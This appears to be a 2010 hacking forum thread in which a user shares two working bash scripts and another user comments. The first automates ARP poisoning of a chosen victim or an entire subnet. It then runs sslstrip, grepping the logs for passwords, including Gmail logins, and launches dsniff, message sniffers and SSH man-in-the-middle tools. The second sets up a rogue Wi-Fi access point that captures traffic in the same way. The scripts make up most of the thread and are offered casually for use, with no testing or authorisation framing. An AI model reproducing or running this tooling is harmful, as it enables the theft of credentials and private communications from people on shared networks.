Arp Poisoning Script

[Junke1990]

Hey guys,

Since I was getting tired of doing everything by hand I made a little script to automate the procedure xD

Let me know if something is done wrong or you have suggestions!

#!/bin/bash
# ARP Poisoning
# Created by Junke1990
# Tested with Asus eee 1000h
# 
### required packages ###
# sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python
# sslstrip -  google, download, extract and alter path below! 

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
logfolder='ARP-logs/'

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi


modprobe tun
sleep 1

# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do 
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "Select your interface to ARP poison. [#] "
read j
int=${iflist[j]}

echo -n "IP address of victim: [x.x.x.x]/[a]"
read vic

# info inet conn
int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"`
int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'`

# lowest IP
oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
oct4=$((oct4+1))
int_a=`echo $int_gw | cut -d. -f1,2,3`
int_a="$int_a.$oct4"

# highest IP
oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
int_b=$((oct4-1))

# range
int_range="$int_a-$int_b"

# determine victim
if [ $vic = "a" ]; then
  vic=$int_range;
fi

# iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# ettercap TCP Ports
# IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3  - 110/TCP 995/TCP
# SMTP  - 25/TCP 465/TCP
# SSL   - 443/TCP
# HTTP  - 80/TCP
# SSH   - 22/TCP
# MSN   - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ   - 5190/TCP - nobody at all uses ICQ xD

xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 &
  sleep 1
  xterm -e tail -f "sslstrip.log" &
  sleep 1
  xterm -e "tail -f sslstrip.log |grep -i 'pass' "& 

  # filters - not fully tested!
  # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"&
  # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd |  sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"&
else 
  echo "sslstrip not found."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if which dsniff >/dev/null; then
  xterm -e dsniff -i $int -m -w dsniff.log &   
fi

# IMSniff - MSN only
if which imsniff >/dev/null; then
  if [ ! -d 'IMlog' ]; then
    mkdir IMlog
  fi
  # gives a lot of unknown content err's
  xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"& 
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if which msgsnarf >/dev/null; then
  xterm -e msgsnarf -i $int &   
fi


### SINGLE VICTIM ONLY ###
# SSH mitm
if which sshmitm >/dev/null; then
  if [ $vic != "a" ]; then
    xterm -e sshmitm -I $vic &   
  fi
fi

# ip_forward
# as last to avoid reset
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "Can't enable ip_forward"
fi

edit: updated the script

Edited April 30, 2010 by Junke1990

[aeiah]

god damnit, i made one too around the same time but posted it a few weeks after, hehe

http://www.hak5.org/forums/index.php?showtopic=16158

my ettercap command is rather standard, just

ettercap -T -i interface -q -M arp:remote /gateway/ /target/

do you know off the top of your head if that command monitors all ports by default? you've specified a lot in your script so i guess mine only monitors port 80. ill have to look into it

[aeiah]

edit: double post FTW

Edited April 30, 2010 by aeiah

[Junke1990]

I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier. But it is still a work in progress.

I have a Soft AP script to if you want I can put it up here to, it is based on this one but has a few other feature since you are actually in the middle of the traffic.

[aeiah]

yea go for it!

[Junke1990]

If you have any sugestions please let me know!

#!/bin/bash
# SoftAP for wireless-testing
# Created/Modded by Junke1990
#
# Hardware: Eee PC 1000h 
# NICs
#  eth0     (LAN)  
#  ra0         (WLAN)        rt2860STA
#  wlan1     (USB WLAN)    RTL8170L    # dealextreme sku.27963 

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'

# services
dsn=0 # Dsniff
ims=0 # IMsniff
msg=0 # MSGsnarf
url=0 # URLsnarf

ssllog1=0 # tail sslstrip.log
ssllog2=0 # tail sslstrip.log |grep pass

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

echo "[>] Starting: Soft AP - Junke1990"
# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do 
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}

# select SoftAP adapter
for i in "${!iflist[@]}"; do
  if [ $j != $i ]; then
    echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
  fi
done
echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}

# MAC address
intAP_MAC=${maclist[j]}

echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`

# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`

BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`

MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK

# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid

# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
 intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi

echo "[+] Setting up fake AP...";
sleep 1;
# to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC
xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1

# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3

echo "[+] Killing dhcpd..."
# do this quiet for when the process isn't running
killall -q dhcpd3

echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
DHCPDCONF='';
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.3.255;
option routers 192.168.3.1;
EOF

### Submitted by ToomSec
for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
  do
      echo "option domain-name-servers $d;" >> dhcpd.conf
  done

cat >> dhcpd.conf << EOF
range 192.168.3.10 192.168.3.254;
}
EOF

echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Setting up forwarding tables..."
# iptables
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN
# ip fwd enable 
echo 1 > /proc/sys/net/ipv4/ip_forward

# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  echo "[+] Setting up sslstrip..."
  xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
  if [ $ssllog1 == 1 ]; then xterm -e tail -f sslstrip.log & fi
  if [ $ssllog2 == 1 ]; then xterm -e "tail -f sslstrip.log |grep 'pass' "& fi
  sleep 1
else 
  echo "[-] SSLStrip not found..."
  echo 'Edit $sslstrip to the correct path.'
fi


# DSniff
if [ $dsn == 1 ]; then 
  if which dsniff >/dev/null; then
    echo "[+] Setting up dsniff..."
    xterm -e dsniff -i at0 -m &   
    sleep 1
  fi
fi

# IMSniff - MSN only
if [ $ims == 1 ]; then 
  if which imsniff >/dev/null; then
    echo "[+] Setting up IMSniff..."
    if [ ! -d 'IMlog' ]; then
      mkdir IMlog
    fi
    # gives a lot of unknown content err's
    xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& 
    sleep 1
  fi
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then 
  if which msgsnarf >/dev/null; then
    echo "[+] Setting up MSGsnarf..."
    xterm -e msgsnarf -i at0 &    
    sleep 1
  fi
fi

# URLSnarf
if [ $url == 1 ]; then
  if which urlsnarf >/dev/null; then
    echo "[+] Setting up URLsnarf..."
    xterm -e urlsnarf -i at0 &
    sleep 1
  fi
fi

# ettercap TCP Ports
# IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3  - 110/TCP 995/TCP
# SMTP  - 25/TCP 465/TCP
# SSL   - 443/TCP
# HTTP  - 80/TCP
# SSH   - 22/TCP
# MSN   - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ   - 5190/TCP - nobody at all uses ICQ xD

echo "[+] Setting up ettercap..."
#xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &

### Submitted by ToomSec
#ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1
xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 &
sleep 1

# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "[-] Can NOT enable ip_forward..."
fi

echo "[x] All done! have fun!"